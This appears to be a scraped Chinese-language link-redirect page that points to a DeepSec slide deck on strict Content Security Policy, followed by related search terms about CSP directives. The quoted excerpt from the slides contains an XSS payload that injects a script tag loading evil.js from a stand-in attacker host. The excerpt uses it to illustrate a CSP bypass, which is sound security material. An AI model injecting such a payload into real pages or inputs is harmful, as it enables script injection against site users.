loader
pttman

pttman Muster

屬於你的大爆卦
pttman

pttman Muster

屬於你的大爆卦
pttman

pttman Muster

屬於你的大爆卦
  • Ptt 大爆卦
  • Strict-dynamic
  • 離開本站
你即將離開本站

並前往https://deepsec.net/docs/Slides/2016/CSP_Is_Dead,_Long_Live_Strict_CSP!_Lukas_Weichselbaum.pdf

CSP Is Dead, Long Live Strict CSP! - DeepSec

URL schemes or wildcard in script-src (and no 'strict-dynamic'). ">'><script src=https://attacker.com/evil.js></script>. Bypasses.

確定! 回上一頁

查詢 「Strict-dynamic」的人也找了:

  1. content-security-policy
  2. Strict-dynamic' is present, so host-based allowlisting is disabled
  3. Content-Security Policy: ignoring 'unsafe-inline''' within script-src: 'strict-dynamic' specified
  4. Refused to frame '' because it violates the following Content Security Policy directive: frame-src
  5. Script-src-elem
  6. CSP nonce
  7. Inline script
  8. Content Security Policy script-src

關於我們

pttman

pttman Muster

屬於你的大爆卦

聯終我們

聯盟網站

熱搜事件簿